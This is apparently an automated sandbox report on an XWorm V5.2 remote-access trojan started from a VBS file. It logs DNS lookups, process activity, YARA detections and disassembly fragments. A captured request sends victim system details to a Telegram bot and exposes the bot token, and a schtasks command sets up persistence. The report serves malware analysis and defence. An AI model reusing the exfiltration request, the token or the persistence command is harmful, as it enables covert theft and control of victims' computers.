Oct 6, 2024 16:45:37.336631060 CEST | 1.1.1.1 | 192.168.2.7 | 0x3a79 | Name error (3) | 50.23.12.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Oct 6, 2024 16:46:00.029333115 CEST | 1.1.1.1 | 192.168.2.7 | 0xafa7 | No error (0) | isika.ddns.net | | 45.88.91.147 | A (IP address) | IN (0x0001) | false
• api.telegram.org
• ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49699 | 208.95.112.1 | 80 | 1204 | C:\Users\user\AppData\Local\Temp\WindowsApp.exe
Timestamp | Bytes transferred | Direction | Data
Oct 6, 2024 16:45:08.409285069 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Oct 6, 2024 16:45:08.869294882 CEST | 175 | IN | HTTP/1.1 200 OK
Date: Sun, 06 Oct 2024 14:45:07 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49701 | 149.154.167.220 | 443 | 1204 | C:\Users\user\AppData\Local\Temp\WindowsApp.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-06 14:45:11 UTC | 453 | OUT | GET /bot7048705146:AAEWMpbRl0e1tLVdgRabv3lMkCrjbYtiS70/sendMessage?chat_id=7062075018&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A662C920EC437F040F44A%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%201YPBEL4ES%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2024-10-06 14:45:11 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Sun, 06 Oct 2024 14:45:11 GMT
Content-Type: application/json
Content-Length: 441
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-06 14:45:11 UTC | 441 | IN | Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 30 34 38 37 30 35 31 34 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 64 38 33 64 5c 75 64 64 33 34 4f 6e 6c 69 6e 65 5c 75 64 38 33 64 5c 75 64 64 33 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 69 67 61 6c 6f 61 6e 65 72 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 30 36 32 30 37 35 30 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 49 53 49 4b 41 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 38 32 32 35 39 31 31 2c 22 74 65 78 74 22 3a 22 5c 75 32 36 32 30 20 5b 58 57 6f 72 6d 20 56 35 2e
Data Ascii: {"ok":true,"result":{"message_id":56,"from":{"id":7048705146,"is_bot":true,"first_name":"\ud83d\udd34Online\ud83d\udd34","username":"GigaloanerBot"},"chat":{"id":7062075018,"first_name":"ISIKA","type":"private"},"date":1728225911,"text":"\u2620 [XWorm V5.



Target ID: 2
Start time: 10:45:02
Start date: 06/10/2024
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA-injazfe-10424.vbs"
Imagebase: 0x7ff72c240000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 10:45:02
Start date: 06/10/2024
Path: C:\Users\user\AppData\Local\Temp\WindowsApp.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user~1\AppData\Local\Temp\WindowsApp.exe"
Imagebase: 0x200000
File size: 220'160 bytes
MD5 hash: 0C3A47BC813554D40583861DDCDE06B8
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000002.2427816962.0000000002481000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2427816962.0000000002481000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.2427816962.0000000002481000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Reputation: low
Has exited: true

Target ID: 10
Start time: 10:45:09
Start date: 06/10/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "task" /tr "C:\Users\user\AppData\Roaming\task.exe"
Imagebase: 0x7ff68a8a0000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 10:45:09
Start date: 06/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 12
Start time: 10:45:10
Start date: 06/10/2024
Path: C:\Users\user\AppData\Roaming\task.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\AppData\Roaming\task.exe
Imagebase: 0xbb0000
File size: 220'160 bytes
MD5 hash: 0C3A47BC813554D40583861DDCDE06B8
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000C.00000002.1401173350.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.1401173350.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000C.00000002.1401173350.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:14
                                                    Start time:10:45:18
                                                    Start date:06/10/2024
                                                    Path:C:\Users\user\AppData\Roaming\task.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\AppData\Roaming\task.exe"
                                                    Imagebase:0xdf0000
                                                    File size:220'160 bytes
                                                    MD5 hash:0C3A47BC813554D40583861DDCDE06B8
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000E.00000002.1470803241.000000000313A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.1470803241.000000000313A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000E.00000002.1470803241.000000000313A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:15
                                                    Start time:12:20:07
                                                    Start date:06/10/2024
                                                    Path:C:\Users\user\AppData\Roaming\task.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\AppData\Roaming\task.exe
                                                    Imagebase:0x9c0000
                                                    File size:220'160 bytes
                                                    MD5 hash:0C3A47BC813554D40583861DDCDE06B8
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000F.00000002.1517385326.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.1517385326.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000F.00000002.1517385326.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:16
                                                    Start time:12:20:11
                                                    Start date:06/10/2024
                                                    Path:C:\Users\user\AppData\Roaming\task.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\AppData\Roaming\task.exe"
                                                    Imagebase:0x40000
                                                    File size:220'160 bytes
                                                    MD5 hash:0C3A47BC813554D40583861DDCDE06B8
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000010.00000002.1554860101.000000000231E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000010.00000002.1554860101.000000000231E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000010.00000002.1554860101.000000000231E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:20
                                                    Start time:12:21:00
                                                    Start date:06/10/2024
                                                    Path:C:\Users\user\AppData\Roaming\task.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\AppData\Roaming\task.exe
                                                    Imagebase:0xef0000
                                                    File size:220'160 bytes
                                                    MD5 hash:0C3A47BC813554D40583861DDCDE06B8
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000014.00000002.2187461763.000000000324C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000014.00000002.2187461763.000000000324C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000014.00000002.2187461763.000000000324C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:23
                                                    Start time:12:21:24
                                                    Start date:06/10/2024
                                                    Path:C:\Windows\System32\WerFault.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 1204 -s 3304
                                                    Imagebase:0x7ff74efc0000
                                                    File size:570'736 bytes
                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true


                                                      Execution Graph

                                                      Execution Coverage:11.8%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:66.7%
                                                      Total number of Nodes:9
                                                      Total number of Limit Nodes:0

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 115 7ffaac4e0235-7ffaac4e08d8 CheckRemoteDebuggerPresent 143 7ffaac4e08e0-7ffaac4e094c 115->143 144 7ffaac4e08da 115->144 144->143
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4d4000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 00d1cec9610478e4fb2ea590b70396fdc6eedc4b5d7f177c2873fb32de991612
                                                      • Instruction ID: 1584b4baa1fdbcfca0d3c3a57dc73812e9fe734b994f32e30f6f08180359a95f
                                                      • Opcode Fuzzy Hash: 00d1cec9610478e4fb2ea590b70396fdc6eedc4b5d7f177c2873fb32de991612
                                                      • Instruction Fuzzy Hash: 78910471D0D689CFEB55CB68C4596E9BFF0FF62310F0481AAC458D7192DB349849CB94

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 147 7ffaac4e3799-7ffaac4e37a5 148 7ffaac4e37a7-7ffaac4e37af 147->148 149 7ffaac4e37b0-7ffaac4e3859 147->149 148->149 153 7ffaac4e3868-7ffaac4e38ee SetWindowsHookExW 149->153 154 7ffaac4e385b-7ffaac4e3865 149->154 155 7ffaac4e38f6-7ffaac4e3963 153->155 156 7ffaac4e38f0 153->156 154->153 156->155
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4d4000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID: HookWindows
                                                      • String ID:
                                                      • API String ID: 2559412058-0
                                                      • Opcode ID: ef7d63d1a56b9b5db95637acbb8d782c78745c259169801d7b159160787fc812
                                                      • Instruction ID: 6685c58072d924479f70242efe626833727f740128e19bb1fe229422b64c76d2
                                                      • Opcode Fuzzy Hash: ef7d63d1a56b9b5db95637acbb8d782c78745c259169801d7b159160787fc812
                                                      • Instruction Fuzzy Hash: 44516B70908A5D8FDB58DF68C845BE9BBF0FB1A314F1041AED00DE3292DB74A985CB45

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 168 7ffaac4e07e8-7ffaac4e08d8 CheckRemoteDebuggerPresent 172 7ffaac4e08e0-7ffaac4e094c 168->172 173 7ffaac4e08da 168->173 173->172
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4d4000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID: CheckDebuggerPresentRemote
                                                      • String ID:
                                                      • API String ID: 3662101638-0
                                                      • Opcode ID: b80cb3be980c07e16c4a46f09c004f020fcaa134d892e0c165d121471c14a76d
                                                      • Instruction ID: 057abfa3f75cb695438f1bba97bd78d4c527cbae051213a394b6cd85e1e0fa68
                                                      • Opcode Fuzzy Hash: b80cb3be980c07e16c4a46f09c004f020fcaa134d892e0c165d121471c14a76d
                                                      • Instruction Fuzzy Hash: 33511470D0860C8FEB94DFA9C489BEDBBF1EB69311F10816AD409E3251DB749989CF80
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4d4000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a179bff6946361d019966de93ef2d13e13f351293f36070812f94ccb0f0ce129
                                                      • Instruction ID: 772d423680a008e9f449da855abcb1ef4b3b783fd4eecdd343184e3422856667
                                                      • Opcode Fuzzy Hash: a179bff6946361d019966de93ef2d13e13f351293f36070812f94ccb0f0ce129
                                                      • Instruction Fuzzy Hash: 0A324D70919A8D8FEBB9EF28C859BE937E1FB59301F00412AD84EC76A1DF749584CB41
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4d4000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1f3d144710631f5f7b1ced566195ab8b21bb4b93572f77a7fde2d16e230a4dc9
                                                      • Instruction ID: 17488904423ef0ea944b258103068bed6c4eeb76809b2d61d3daef75d458bee4
                                                      • Opcode Fuzzy Hash: 1f3d144710631f5f7b1ced566195ab8b21bb4b93572f77a7fde2d16e230a4dc9
                                                      • Instruction Fuzzy Hash: EE325D70919A8D8FEBB9EF28C859BE937E1FB59311F00412AD84EC7291DF749584CB81
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4d4000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9beba542cdd76b56cb79e53a2f5c2410a84e2bbd927412fa7b57df8c8f5965e8
                                                      • Instruction ID: 9d05370b0365ea9bdd7027fa9c0c7d326fae3d6978fae2bbbe5fd1e852a4a2ea
                                                      • Opcode Fuzzy Hash: 9beba542cdd76b56cb79e53a2f5c2410a84e2bbd927412fa7b57df8c8f5965e8
                                                      • Instruction Fuzzy Hash: 5AF15C70509A8D8FEBB9EF28C859BE937E1FF59301F00812AD84EC7291DB759945CB81
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4d4000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3994b02932d4322ddf9fe8eaaf06ba545a1c0e9638b5ad1af4a61be359f17588
                                                      • Instruction ID: 44462b2cca64123ddbc2251661b129f93762e682d17a32cbb0f79baf3f8d3e1a
                                                      • Opcode Fuzzy Hash: 3994b02932d4322ddf9fe8eaaf06ba545a1c0e9638b5ad1af4a61be359f17588
                                                      • Instruction Fuzzy Hash: 3CA1677090874C8FDB95DF68C895BE9BBF1FB5A300F1081AAC44DE3292CA34A985CF41
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4d4000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1a51ae17dce49fa6badc1e8831176d04f28303d26f3ace3714d248e31c797859
                                                      • Instruction ID: babfcaa052ef61a9f3018803641fba3e464570b48e46057009f5afe2ebffafd9
                                                      • Opcode Fuzzy Hash: 1a51ae17dce49fa6badc1e8831176d04f28303d26f3ace3714d248e31c797859
                                                      • Instruction Fuzzy Hash: 91810A70D0861C8FDB94DF68C895BE9BBB1FB5A304F1081AED44EE3251DA34A985CF45
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4cb000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d840c2795e706f5865e1fb006b7ea9293de73ed2fcde8993ce805afe0ff8bf81
                                                      • Instruction ID: 436396113420f6bb54ab5c3fc8dc92c8a7142834c972e1db84cac2e16dd4c3d9
                                                      • Opcode Fuzzy Hash: d840c2795e706f5865e1fb006b7ea9293de73ed2fcde8993ce805afe0ff8bf81
                                                      • Instruction Fuzzy Hash: 4E417C3160D2894FE71E9A3888561B57B96EB83320B15C3BFD4CBC7197DD28980B83C5
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4cb000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1c887646512b7f0bad1f2314952e4bd2557ec4a905aff2de3c4d2e09263039a6
                                                      • Instruction ID: 27dba7944ea26737c26bf003c711cb817d3c22344dac67dca644ecf882541ec6
                                                      • Opcode Fuzzy Hash: 1c887646512b7f0bad1f2314952e4bd2557ec4a905aff2de3c4d2e09263039a6
                                                      • Instruction Fuzzy Hash: 9341383160D2894FE71E9A3888561B57BA6EB83320B15C2BFD48BC71E7DD24980B83D5
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4cb000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a6c61865140aeec3e8324e9d0cc5a740655c9da7432fa3c3e6568a41379730a4
                                                      • Instruction ID: 72ecb9a8d40d025c191d3fc07d079d831bbdc6ac9262437024e56c2c99ada03b
                                                      • Opcode Fuzzy Hash: a6c61865140aeec3e8324e9d0cc5a740655c9da7432fa3c3e6568a41379730a4
                                                      • Instruction Fuzzy Hash: F8213D7264D3890FE31C5D68ACDB477BB98E783214742927FE6C7C65A3DD18941742C1

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 161 7ffaac4cbcf5-7ffaac4cbe27 VirtualProtect 165 7ffaac4cbe29 161->165 166 7ffaac4cbe2f-7ffaac4cbe7d 161->166 165->166
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4cb000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 700adbc10616650fef20f1847ed3608f3afb28380fbcd873c40e8562c54b70a1
                                                      • Instruction ID: 547211de2b04c5d048accff35af4c518f4b5fd5b0485b2612e08cd28a94beff8
                                                      • Opcode Fuzzy Hash: 700adbc10616650fef20f1847ed3608f3afb28380fbcd873c40e8562c54b70a1
                                                      • Instruction Fuzzy Hash: E751397090871C8FDB58DF98D885AEDBBF1FB69315F10426ED04AE3251DB70A985CB81

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 176 7ffaac4c6ad0-7ffaac4c6b81 179 7ffaac4c6b84-7ffaac4c6bc3 176->179 180 7ffaac4c6b83 176->180 182 7ffaac4c6bc5 179->182 183 7ffaac4c6bca-7ffaac4c6bfb 179->183 180->179 182->183 186 7ffaac4c6c02-7ffaac4c6c26 183->186 187 7ffaac4c6c43-7ffaac4c6c44 186->187 188 7ffaac4c6c28-7ffaac4c6cee 186->188 189 7ffaac4c6e82-7ffaac4c6ea4 187->189 190 7ffaac4c6e5d-7ffaac4c6e7d 187->190 188->186 189->190 195 7ffaac4c6ea6-7ffaac4c6eb6 189->195 190->186 196 7ffaac4c6eb8-7ffaac4c6eba 195->196 197 7ffaac4c6f1d-7ffaac4c6f3e 196->197 198 7ffaac4c6ebc-7ffaac4c6f1c 196->198 199 7ffaac4c6f45-7ffaac4c6f53 197->199 198->197
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C6000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4c6000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: r6
                                                      • API String ID: 0-2984296541
                                                      • Opcode ID: 74083e38cff0f3695d784e364a9e7ea7e27dd05c9d598f6f2f008b5beaa764e0
                                                      • Instruction ID: d8675fc591e6e08bdf5ecac239c82731851eb2e1d67cba22c74fa5b771582d09
                                                      • Opcode Fuzzy Hash: 74083e38cff0f3695d784e364a9e7ea7e27dd05c9d598f6f2f008b5beaa764e0
                                                      • Instruction Fuzzy Hash: 5C91F07490D7888FEB46DF68C8557D87FF1EF5A300F0580EAC049D72A2DA389849CB90

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 253 7ffaac4c07f2-7ffaac4c0825 256 7ffaac4c0826-7ffaac4c0848 253->256 259 7ffaac4c084a-7ffaac4c08c7 256->259 260 7ffaac4c07ce-7ffaac4c07e9 256->260 269 7ffaac4c08c9 259->269 270 7ffaac4c08ce call 7ffaac4c0500 259->270 260->256 264 7ffaac4c07eb-7ffaac4c07f1 260->264 269->270 272 7ffaac4c08d3-7ffaac4c091b 270->272 274 7ffaac4c091d-7ffaac4c093a 272->274 275 7ffaac4c093e-7ffaac4c093f 272->275 274->275
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4c0000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: <M_^
                                                      • API String ID: 0-1376500734
                                                      • Opcode ID: bd358660d31fa1f86f4e2c65f11979c1855538394a46cd212ace93bf0bf168fe
                                                      • Instruction ID: a1af23258ceebbd77941e347e0a890c09b1a18a0ff8f4cb80dfd10db79850758
                                                      • Opcode Fuzzy Hash: bd358660d31fa1f86f4e2c65f11979c1855538394a46cd212ace93bf0bf168fe
                                                      • Instruction Fuzzy Hash: 6141D77140E7C98FE7239B2898A56D53FA09F43318F0941BBD099CE1A3DD28554EC7A5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C6000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4c6000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: r6
                                                      • API String ID: 0-2984296541
                                                      • Opcode ID: 7ec7a200bed4828ec74c8c504c4686357f04ecd740b481dae529fc8c86e3ab73
                                                      • Instruction ID: e6ca1ddf1092c5b964ca4458a17fefbc5dd561946c02df4f82eb4788d4337323
                                                      • Opcode Fuzzy Hash: 7ec7a200bed4828ec74c8c504c4686357f04ecd740b481dae529fc8c86e3ab73
                                                      • Instruction Fuzzy Hash: 98111970E0960D8FEB99DF68C4A5AECB7F1EB5A300F1081AAC40DE72A1DA3459448F55
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C6000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4c6000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "9
                                                      • API String ID: 0-1061052283
                                                      • Opcode ID: 63eaf7435d3da15181422a2d13685f60a7840fd08a71974c1308ab7fdecc90ac
                                                      • Instruction ID: bf09929d45cf42d3b3762cf9a4151cfb053150971e3bcc01b851dbbd6ba6a52b
                                                      • Opcode Fuzzy Hash: 63eaf7435d3da15181422a2d13685f60a7840fd08a71974c1308ab7fdecc90ac
                                                      • Instruction Fuzzy Hash: 50F04FB1D099598EFB98DB58D855AECBBA1FB14200F10C1BAC00EE7251DE2459818B45
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C6000, based on PE: false
                                                      Joe Sandbox IDA Plugin
